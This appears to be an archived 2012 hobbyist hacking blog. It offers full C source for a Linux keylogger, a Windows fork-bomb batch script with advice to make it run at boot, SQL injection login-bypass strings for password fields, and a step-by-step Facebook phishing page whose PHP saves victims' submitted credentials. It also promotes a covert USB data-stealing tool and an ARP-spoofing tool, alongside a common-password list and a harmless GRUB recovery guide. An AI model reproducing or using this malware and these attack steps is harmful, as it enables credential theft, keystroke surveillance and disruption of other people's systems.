Friday, 14 December 2012

Linux Keylogger Source Code


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/io.h>
#define KB_IO 0X60
#define KB_ST 0x64
#define SLEEP 50
        char key(int code) {
                int i;
                int ascii_code[] = {
                11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
                31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
                51, 52, 53, 57};
                int ascii_char[] = {
                '0', '\'', 'ì', '\b', '\t', 'q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', 'è',
                '+', '\n', 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'ò', 'à', '<', 'ù', 'z',
                'x', 'c', 'v', 'b', 'n', 'm', ',', '.', '-', ' '};
                for (i = 0; i < 42; i++) {
                        if (code == ascii_code[i])
                                return ascii_char[i];
                }
        }
        int main(int argc, char **argv) {
                int code = 0;
                int last = 0;
                FILE *file;
                if (!argv[1]) {
                        fprintf(stderr, "%s <file>\n", argv[0]);
                        exit(1);
                }
                if (!(file = fopen(argv[1], "w"))) {
                        fprintf(stderr, "Impossibile scrivere sul file %s\n", argv[1]);
                        exit(2);
                }
                if (ioperm(KB_IO, 1, 1) == -1 || ioperm(KB_ST, 1, 1) == -1) {
                        fprintf(stderr, "Impossibile accedere alla porta di I/O della tastiera\n");
                        exit(3);                }
                while (1) {
                        code = 0;
                        if (inb(KB_ST) == 20)
                                code = inb(KB_IO);
                        if (code) {
                                if (code != last) {
                                        last = code;
                                        if (key(code)) {
                                                fprintf(file, "%c", key(code));
                                                fflush(file);
                                        }
                                }
                        }
                        usleep(SLEEP);
                }
                return 0;
  }



I do not own this code..
I just copied from some website.

Wednesday, 5 December 2012

Worst Passwords / Password generally used

Perfect Passwords: Selection, Protection, Authentication
Mark Burnett Copyright Syngress Publishing, Inc.2006Syngress Publishing182

Top 1-100 Top 101–200 Top 201–300 Top 301–400 Top 401–500
123456 porsche firebird prince rosebud
password guitar butter beach jaguar
12345678 chelsea united amateur great
1234 black turtle 7777777 cool
pussy diamond steelers muffin cooper
12345 nascar tiffany redsox 1313
dragon jackson zxcvbn star scorpio
qwerty cameron tomcat testing mountain
696969 654321 golf shannon madison
mustang computer bond007 murphy 987654
letmein amanda bear frank brazil
baseball wizard tiger hannah lauren
master xxxxxxxx doctor dave japan
michael money gateway eagle1 naked
football phoenix gators 11111 squirt
shadow mickey angel mother stars
monkey bailey junior nathan apple
abc123 knight thx1138 raiders alexis
pass iceman porno steve aaaa
fuckme tigers badboy forever bonnie
6969 purple debbie angela peaches
jordan andrea spider viper jasmine
harley horny melissa ou812 kevin
ranger dakota booger jake matt
iwantu aaaaaa 1212 lovers qwertyui
jennifer player flyers suckit danielle
hunter sunshine fish gregory beaver
fuck morgan porn buddy 4321
2000 starwars matrix whatever 4128
test boomer teens young runner
batman cowboys scooby nicholas swimming
trustno1 edward jason lucky dolphin
thomas charles walter helpme gordon
tigger girls cumshot jackie casper
robert booboo boston monica stupid
access coffee braves midnight shit
love xxxxxx yankee college saturn
buster bulldog lover baby gemini
1234567 ncc1701 barney cunt apples
soccer rabbit victor brian august
hockey peanut tucker mark 3333
killer john princess startrek canada
george johnny mercedes sierra blazer
sexy gandalf 5150 leather cumming
andrew spanky doggie 232323 hunting
charlie winter zzzzzz 4444 kitty
superman brandy gunner beavis rainbow
asshole compaq horney bigcock 112233
fuckyou carlos bubba happy arthur
dallas tennis 2112 sophie cream
jessica james fred ladies calvin
panties mike johnson naughty shaved
pepper brandon xxxxx giants surfer
1111 fender tits booty samson
austin anthony member blonde kelly
william blowme boobs fucked paul
daniel ferrari donald golden mine
golfer cookie bigdaddy 0 king
summer chicken bronco fire racing
heather maverick penis sandra 5555
hammer chicago voyager pookie eagle
yankees joseph rangers packers hentai
joshua diablo birdie einstein newyork
maggie sexsex trouble dolphins little
biteme hardcore white 0 redwings
enter 666666 topgun chevy smith
ashley willie bigtits winston sticky
thunder welcome bitches warrior cocacola
cowboy chris green sammy animal
silver panther super slut broncos
richard yamaha qazwsx 8675309 private
fucker justin magic zxcvbnm skippy
orange banana lakers nipples marvin
merlin driver rachel power blondes
michelle marine slayer victoria enjoy
corvette angels scott asdfgh girl
bigdog fishing 2222 vagina apollo
cheese david asdf toyota parker
matthew maddog video travis qwert
121212 hooters london hotdog time
patrick wilson 7777 paris sydney
martin butthead marlboro rock women
freedom dennis srinivas xxxx voodoo
ginger fucking internet extreme magnum
blowjob captain action redskins juice
nicole bigdick carter erotic abgrtyu
sparky chester jasper dirty 777777
yellow smokey monster ford dreams
camaro xavier teresa freddy maxwell
secret steven jeremy arsenal music
dick viking 11111111 access14 rush2112
falcon snoopy bill wolf russia
taylor blue crystal nipple scorpion
111111 eagles peter iloveyou rebecca
131313 winner pussies alex tester
123123 samantha cock florida mistress
bitch house beer eric phantom
hello miller rocket legend billy
scooter flower theman movie 6666
please jack oliver success albert

Sunday, 2 December 2012

Simple Code to create you own chat messenger for LAN

Step 1: open CMD
Step 2: write edit msg.bat
Step 3: add following code in file & save it.
@echo off
:A
echo Messenger
set /P n=User/IP:
set /P m=Message:
msg %n% %m%
pause
goto A

Step 4: Run this msg.bat file.

Simple Virus to Hang the Windows System. Windows Shell Script :D

Step1: open CMD

Step 2: Write edit hack.bat

Step 3: Write following code

:A
start
goto A

Step 4: Save the file and Run this file on any system.

It will just hang your system by creating infinite processes. Like DOS attack on you system locally.

If you reboot directly then you system will be normal again.

To do more evil...
============
Make entry of this file in windows registry for boot time run..

:D

Saturday, 1 December 2012

Grub installation to recover linux again after windows installation

When we install windows on Linux(Ubuntu/Fedora) Machine, Windows bootloader override Linux bootloader and you can not boot linux again. After Windows installation on Linux(Ubuntu/Fedora) machine,you can only see windows boot screen. To solve this problem we need to install Linux bootloader again and override it with windows bootloader.

Normally Linux use GRUB(Grand Universal Bootloader) Bootloader.
Windows use BootMGR(Boot Manager).

Now follow the steps to get you Linux(Ubuntu/Fedora) Operating System Back.

Step1: Download the ISO of System Rescue CD from it's website
http://www.sysresccd.org/SystemRescueCd_Homepage

Now either burn it on cd/dvd or burn it on pendrive.

Step 2: Reboot your system via this DVD/Pendrive and run SystemRescue OS

Step 3: Open the terminal and use following commands.

Command 1: fsarchiver probe simple

here check for linux boot partition or linux partition i.e. sda1 , sda2 ..etc..

Command 2: mkdir  /mnt/linux
Command 3: mount /dev/sda2  /mnt/linux

here my linux boot partition name is sda2. You need to write your own linux partition name that you had from command 1.

Command 4: mount -o bind /proc  /mnt/linux/proc
Command 5: mount -o bind /dev  /mnt/linux/dev
Command 6: mount -o bind /sys  /mnt/linux/sys

Command 7: chroot /mnt/linux  /bin/bash
Command 8: grub-install /dev/sda

Command 9: umount /mnt/linux/dev
Command 10: umount /mnt/linux/proc
Command 11: umount /mnt/linux/sys
Command 12: umount /mnt/linux/boot
Command 13: umount /mnt/linux



Sunday, 23 September 2012

List of Sql Injection code strings



Here is the SQL injection strings..
Use them in the password field and see the magic... :)


' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

") or ("a"="a

Sql Injection.. How it works..

This Image explain everything... :)

Simple Phishing Technique/How to hack Facebook Account


Simple Phishing Technique/How to hack Facebook Account


Phishing is a technique in which hacker fools the victim by fake web page and steal his information. It is very easy to set up phishing on same computer. Using this you can  Following are the steps.
Step 1: Install Wamp Server
Step 2: Open “facebook.com”.  Save facebook login page.
Step 3: Open facebook saved html file in notepad or notepad++. Search for html tag “form” and change it’s attribute action with “login.php”. i.e. <form -----------action=”login.php”---->
Step 4: Create new file “login.php” and write following code in that file.
<?php
header("Location: http://www.facebook.com");
$handle = fopen("thepasses.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, " ");
}
fwrite($handle, "     ");
fclose($handle);
exit;
?>
Step 5: now copy “login.php”, “facebook.html” and folder  “facebook” to wamp server’s “www” folder.

Step 6: Start wamp server’s localhost page and open facebook.html page.

Step 7: Bookmark that page.and next time open wamp server and open that bookmarked page.

USB DATA STEALER


USB DATA STEALER

Now a days USB(Universal Serial Bus) has been important part of our life. Almost all kind of data sharing between friends and office colleagues is done using Pen Drive or similar kind of device. In corporate, important & confidential data sharing using USB is very unsecure. What if you insert Pen Drive into your friend’s laptop to give you family picnic photo to him and the same Pen Drive has very confidential data of your company. You believe that if you copy photos by your self to your friend’s computer and he had no chance to even see the content of you Pen Drive then you are wrong…!!!!
USB DATA STEALERs are great tools for hackers who want to steal data from Pen Drive inserted by others into your system. This program work in background and the naïve person can not recognize its presence. It is not detected by any Anti-Virus software as a threat to system. All you need to do is start this software and it will run in background. As soon as any person inserts Pen Drive into your system, this program will start copying all the data from the Pen Drive without notice. Most tools are freeware and available on internet. So if have no intention to share something then don’t keep it in Pen Drive.

TOOL: USB Dumper

v  USB Dumper is an application that runs a background process which copies the file from any USB device connected to your system silently.
v  It is very simple and not detectable as security threat.
v  The other person cannot recognize that his data are stolen in front of his eyes.

Screen Shot of the USB Dumper v2.2

Monday, 17 September 2012

NETCUT an amazing tool for arp spoofing

You have your own wireless router at you home..You friend come to your home and use your internet that you don't want. How will you stop him. Saying no is not decent way.
Well, You have an option...
An amazing network tool.


Using this tool you can scan you network. Discover who is using your network. You can disconnect unwanted machines from your network. This tool works on ARP spoofing..

Netcut can help you figure out exactly who is on your network by IP Address, Device Name or MAC address. Designed for use in both the home and the office, netcut can identify which devices are on the network including iPhones, iPads, Mobile Phones and more.
This program can also clone mac addresses of any device on your network to your own adapter. Netcut can also enable and disable any devide on the network and protect computers from ARP spoof attacks.
Very simple to use, netcut will help you administer your network based on the ARP protocol.
Easy to use: One click to Protect user Computer Function! No one in the network can cut you off with ARP spoof technology anymore .


Download NETCUT:

HAPPY HACKING... :)